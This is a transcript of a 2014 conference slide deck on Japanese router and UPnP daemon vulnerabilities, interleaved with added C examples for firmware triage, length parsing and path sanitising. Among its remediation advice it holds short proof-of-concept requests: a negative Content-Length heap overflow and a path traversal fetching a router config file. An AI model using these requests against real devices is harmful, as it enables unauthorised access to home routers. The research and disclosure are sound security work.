CODE BLUE 2014 : Embedded Security in The Land of the Rising Sun by BEN SCHMIDT & PAUL MAKOWSKI
Page 1

Embedded Security in the Land of the Rising Sun

Ben Schmidt (presenter) // @_supernothing, Lord Commander of Security Research @NarfIndustries

Paul Makowski (assistant to the presenter) // @myhndl, Director of World Domination @NarfIndustries

Page 2

this talk: Japanese router hacking
●  motivation
●  0knowledge to 0day
●  landscape
●  attack surface
●  vulnerabilities
●  exploitation demos
●  remediation

Page 3

why hack Japanese routers?
●  comparatively little public research
●  who doesn’t love junk hacking?*
●  in seriousness, these routers matter a lot
    o  there are many listening on WAN
    o  they run notoriously insecure software

* the answer is Dave Aitel: https://lists.immunityinc.com/pipermail/dailydave/2014-September/000746.html

(chart: top countries with hosts listening on WAN port 1900, the UPnP default)
●  Japan is #4
●  more on UPnP later

Page 4

0knowledge to 0day
●  when we started, we knew nothing about the Japanese router landscape*
●  barriers: language, infrastructure, hardware acquisition & testing

we hope we don’t set ourselves on fire...

* there’s still plenty we don’t know

Page 5

0knowledge to 0day
●  mostly cultural, few technical obstacles

mitigation                       | enabled?   | good for us?
full ASLR (including PIE)        | no         |
NX / DEP                         | mostly no  |
stack or heap cookies            | mostly yes |
safe unlinking / heap hardening  | sometimes  |

Such security, many lulz, wow

Page 6

landscape
●  a boatload of:
    o  routers
    o  modems
    o  wifi hotspots
    o  webcams
    o  internet-connected picture frames
    o  … much more

Page 7

landscape, con’t: many manufacturers; this is a small sample

(likely) corp | how to ID                                                                                        | models          | protections | good for us?
OKI           | distributed as .bin, is actually .tar.gz, contains ROOTIMG.BIN which is several JFFS2 partitions | XXXXXXXXXXX ... | none        |

Page 8

landscape, con’t: many manufacturers; this is a small sample

(likely) corp | how to ID                         | models          | protections                                                  | good for us?
Buffalo       | binary blob, begins with “bgn”    | XXXXXXXXXXX ... | encrypted, (slightly) modified RC4 w/ static key “Buffalo”   |

Watch https://narfindustries.com/codeblue2014 for a more complete list.
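Added example, not code from the talk: a first-pass triage routine in C for the two packagings described on these slides. It checks the gzip magic (the OKI .bin that is really a .tar.gz), the Buffalo “bgn” prefix, and JFFS2 node headers like those inside ROOTIMG.BIN; the sample buffers are constructed, and the Buffalo RC4 variant is not implemented because the slide does not give its modification.

```c
/* Firmware image triage: which of the packagings on these slides is this? */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum fw_kind { FW_UNKNOWN = 0, FW_GZIP, FW_BUFFALO_BGN, FW_JFFS2 };

/* JFFS2 on-flash node header starts with 16-bit magic 0x1985 and a 16-bit node type. */
#define JFFS2_MAGIC 0x1985u
static int jffs2_nodetype_known(uint16_t t) {
    return t == 0xE001 /* dirent */ || t == 0xE002 /* inode */ || t == 0x2003 /* cleanmarker */;
}

/* Count JFFS2 node headers at 4-byte alignment, trying both byte orders,
 * since MIPS-based routers ship in either endianness. */
size_t count_jffs2_nodes(const unsigned char *buf, size_t n) {
    size_t hits = 0;
    for (size_t i = 0; i + 4 <= n; i += 4) {
        uint16_t m_le = (uint16_t)(buf[i] | (buf[i + 1] << 8));
        uint16_t t_le = (uint16_t)(buf[i + 2] | (buf[i + 3] << 8));
        uint16_t m_be = (uint16_t)((buf[i] << 8) | buf[i + 1]);
        uint16_t t_be = (uint16_t)((buf[i + 2] << 8) | buf[i + 3]);
        if ((m_le == JFFS2_MAGIC && jffs2_nodetype_known(t_le)) ||
            (m_be == JFFS2_MAGIC && jffs2_nodetype_known(t_be)))
            hits++;
    }
    return hits;
}

enum fw_kind identify_firmware(const unsigned char *buf, size_t n) {
    if (n >= 2 && buf[0] == 0x1f && buf[1] == 0x8b) return FW_GZIP;   /* gzip magic: OKI ".bin" */
    if (n >= 3 && memcmp(buf, "bgn", 3) == 0) return FW_BUFFALO_BGN;  /* Buffalo blob header */
    if (count_jffs2_nodes(buf, n) >= 2) return FW_JFFS2;               /* >1 node: not a chance hit */
    return FW_UNKNOWN;
}

/* Constructed samples (not real firmware) for a stand-alone run. */
static const unsigned char SAMPLE_GZIP[] = { 0x1f, 0x8b, 0x08, 0x00 };
static const unsigned char SAMPLE_BGN[] = { 'b', 'g', 'n', 0x00, 0x01, 0x02 };
static const unsigned char SAMPLE_JFFS2[] = {
    0x85, 0x19, 0x03, 0x20, 0x0c, 0x00, 0x00, 0x00,  /* little-endian cleanmarker node */
    0x85, 0x19, 0x02, 0xe0, 0x44, 0x00, 0x00, 0x00,  /* little-endian inode node */
};
```

A real image should be run through binwalk as well; this only decides which unpacking path to take first.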

Page 9

attack surface
●  HTTP
    o  frequently LAN-facing
●  FTP
●  …
●  UPnP
    o  frequently WAN-facing

Page 10

speaking of UPnP...

(figure: Security Flaws in UPnP: Unplug, Don’t Play, Rapid7)

Page 11

speaking of UPnP...

(figure: Security Flaws in UPnP: Unplug, Don’t Play, Rapid7, annotated: we looked here)

Page 12

our favorite UPnP daemon: XXXXXX
●  Shodan
    o  3mil hosts in Japan
    o  almost none anywhere else
●  our research
    o  ~200,000 hosts in Japan at any single time
●  What would you do with a 200,000+ botnet?

Page 13

our favorite UPnP daemon: XXXXXX
●  case study: CompSci security 101
●  every vulnerability you can imagine, everywhere feasible
    o  stack & heap buffer overflows
        !  memcpy, strcpy, sprintf, oh my!
    o  path traversal
        !  download passwords in config files
    o  command injection
        !  as root, duh

Page 14

spot-the-vuln(s): our favorite UPnP daemon: XXXXXX

(code screenshot, annotated: attacker controlled; attacker controlled)

Page 15

spot-the-vuln(s): our favorite UPnP daemon: XXXXXX

(same code screenshot, annotated: attacker controlled; attacker controlled; buffer is overflown... ...here)

Page 16

spot-the-vuln(s): our favorite UPnP daemon: XXXXXX

(same code screenshot, annotated: attacker controlled; attacker controlled; buffer is overflown... ...here; oh yeah and here too)

Page 17

spot-the-vuln(s): our favorite UPnP daemon: XXXXXX

(same code screenshot, annotated: attacker controlled; attacker controlled; buffer is overflown... ...here; oh yeah and here too; but why try harder? root command injection... ...here)

Page 18

spot-the-vuln(s): our favorite UPnP daemon: XXXXXX

(same code screenshot, annotated: attacker controlled; attacker controlled; buffer is overflown... ...here; oh yeah and here too; but why try harder? root command injection... ...here; also here)

Page 19

our favorite UPnP daemon: XXXXXX, in other words…
●  4 lines
●  4 remotely exploitable vulnerabilities

Page 20

demo: UPnP command injection

Page 21

Page 22

HTTP: signedness confusion
1.  specify a negative Content-Length
2.  sanity check does a signed comparison
    o  the check passes
3.  scanf() promotes int to unsigned, copies length specified
4.  overflow heap buffer
5.  ???
6.  profit

Page 23

demo: HTTP signedness confusion

    import socket

    # Python 2; a negative Content-Length passes the daemon's signed sanity check
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.1.1", 2869))
    s.send('GET AAAA\r\nContent-Length: -34\r\n\r\n')
    s.close()
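Added example, not from the slides: the signedness bug of the previous slide in C beside a hardened parser. vuln_body_len() reproduces steps 2 and 3 without performing the copy; BODY_MAX and the function names are assumptions.

```c
#include <errno.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

#define BODY_MAX 1024   /* assumed size of the heap buffer the body is read into */

/* Vulnerable pattern: sscanf into a signed int, a signed sanity check, then the
 * value is converted to size_t for memcpy/recv. Returns the length that would
 * be copied, 0 if the check rejects. */
size_t vuln_body_len(const char *value) {
    int len = 0;
    if (sscanf(value, "%d", &len) != 1) return 0;
    if (len > BODY_MAX) return 0;   /* -34 > 1024 is false, so the check passes */
    return (size_t)len;             /* -34 becomes SIZE_MAX - 33: heap overflow downstream */
}

/* Hardened: digits only (no sign), no trailing garbage, no overflow and an
 * explicit upper bound, all decided before any allocation or copy. */
bool safe_body_len(const char *value, size_t *out) {
    while (*value == ' ' || *value == '\t') value++;   /* optional leading whitespace */
    if (*value < '0' || *value > '9') return false;    /* rejects "-34", "+5", "" */
    errno = 0;
    char *end;
    unsigned long long n = strtoull(value, &end, 10);
    if (errno == ERANGE) return false;                 /* absurdly long digit strings */
    while (*end == ' ' || *end == '\t') end++;
    if (*end != '\0') return false;                    /* "12abc" */
    if (n > BODY_MAX) return false;                    /* larger than the buffer */
    *out = (size_t)n;
    return true;
}
```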

Page 24

HTTP: path traversal
1.  http://192.168.1.1:2869/../SuperSecretStuff
2.  ???
3.  profit

seriously.

Page 25

demo: HTTP path traversal

    import requests

    # Python 2; the daemon serves files above its document root
    print requests.get('http://192.168.1.1:2869/../mainConfig.xml').text
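Added example, not from the slides: one way a server can map a request path onto its document root so that a request like the one above is refused; the docroot, sample paths and function name are assumptions.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Lexically resolve url_path under docroot into out. Returns false if the
 * path would climb above docroot, is malformed, or does not fit. */
bool map_url_to_docroot(const char *docroot, const char *url_path, char *out, size_t outsz) {
    size_t rootlen = strlen(docroot);
    while (rootlen > 1 && docroot[rootlen - 1] == '/') rootlen--;   /* normalise "/srv/www/" */
    if (url_path[0] != '/' || rootlen + 1 > outsz) return false;
    if (strchr(url_path, '%')) return false;   /* caller must percent-decode first; refuse raw escapes */
    memcpy(out, docroot, rootlen);
    out[rootlen] = '\0';
    size_t len = rootlen;
    const char *p = url_path;
    while (*p) {
        while (*p == '/') p++;                 /* skip empty segments ("//") */
        if (!*p) break;
        const char *seg = p;
        while (*p && *p != '/') p++;
        size_t seglen = (size_t)(p - seg);
        if (seglen == 1 && seg[0] == '.') continue;
        if (seglen == 2 && seg[0] == '.' && seg[1] == '.') {
            if (len <= rootlen) return false;  /* ".." would escape the docroot */
            while (len > rootlen && out[len - 1] != '/') len--;
            len--;                             /* drop the separator as well */
            out[len] = '\0';
            continue;
        }
        if (len + 1 + seglen >= outsz) return false;
        out[len++] = '/';
        memcpy(out + len, seg, seglen);
        len += seglen;
        out[len] = '\0';
    }
    return true;
}
```

This is a lexical check only: percent-decoding must happen before it, and symlinks inside the docroot still need realpath() or a chroot to contain.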

Page 26

why this matters
●  what to do with 200,000 home routers?
    o  violate privacy, capture all traffic
    o  impersonate victims
    o  man-in-the-middle, exploit end hosts
    o  use as basis for covert infrastructure, misattributing further attacks
    o  cripple national infrastructure through DDoS attacks

Page 27

more Japanese statistics
●  200,000+: number of routers / modems running the discussed vulnerable UPnP service on WAN
●  500,000+: number of devices running a UPnP daemon and listening on WAN on the default port
    o  can be used to map internal ports, expose additional vulns
●  1,700,000+: number of devices running an HTTP daemon and listening on WAN on the default port
    o  93,000+ of these are not running either Apache or IIS

Page 28

remediation
●  patching vulns is a non-starter
    o  there are too many, no one cares to find them all
●  what we’ve demonstrated is only the beginning
    o  seriously, we ctrl-f’ed for system()... profit
●  need to start over

Page 29

remediation: manufacturers (1/3)
●  use modern exploit mitigations
    o  userspace: NX / DEP, ASLR*, stack / heap hardening
    o  kernelspace: grsecurity
●  fail closed: default settings matter
    o  don’t listen to anything on WAN by default
    o  if remote admin is required by the customer, require key-based authentication (e.g. SSH, CWMP/TR-069 or similar)

* This means PIE. Binaries that are not PIE are not full ASLR. Anything less than full ASLR is mostly pointless.

Page 30

remediation: manufacturers (2/3)
●  privilege separation
    o  there is no reason to run everything as root*
●  sandbox everything: seccomp_bpf()
    o  Why is your UPnP daemon able to install kernel modules or read / write outside of its home?
●  don’t implement your own HTTP / FTP / UPnP / Gopher / whatever service
    o  obscurity < audited code

* Laziness doesn’t count. It’s 2014; attackers have a lot to gain, you have a lot to lose and embedded devices are often the lowest hanging fruit.

Page 31

remediation: manufacturers (3/3)
●  deter physical access
    o  cut unnecessary debug ports, no JTAG, no serial
    o  limited effect on determined attackers
●  make analysis difficult
    o  firmware encryption & signing
●  scope the set of possible vulnerabilities
    o  if you must write your own software, why not write it in Python or Ruby?

Page 32

things that don’t work
●  security through obscurity
    o  yes, someone* has figured out how to extract YetAnotherObscureFileSystem
●  outmoded threat models / thinking your software isn’t interesting
    o  attackers target more than end hosts
    o  there is plenty (sometimes more) value in pwning infrastructure

* The contributors and projects behind binwalk (https://github.com/devttys0/binwalk) to be specific.

Page 33

remediation: end users
●  firewall everything
    o  only sane approach is to assume compromise on seldom-updated embedded devices such as modems and routers
    o  the catch: many of these embedded devices are between you and the Internet
●  whenever possible, run custom firmware
    o  let someone else be the easiest target

Page 34

conclusions
●  there needs to be more (public) research interest in Japanese infrastructure
●  cultural barriers are surmountable even by curious people in their spare time
    o  we conducted this research from the US, without direct access to Japanese infrastructure or devices
    o  determined attackers will hardly be slowed
●  the fixes are not simple
    o  vulnerabilities are numerous
    o  problems run deep

Page 35

thanks
●  Google translate
●  Yahoo! auctions
●  Icons licensed under CC BY 3.0:
    o  router, modem, wifi, webcam, question mark, flame by flaticon.com user Freepik
    o  picture frame by flaticon.com user Icomoon
    o  thumbs up by flaticon.com user Amit Jakhu
    o  video camera by flaticon.com user simpleicon

Page 36

questions?

Want to learn more? Narf offers custom embedded device security training classes in Japanese & English. Material is licensed & translated from TacNetSol’s world-renowned EDE course. For more information, visit our website: https://narfindustries.com/index.php?id=training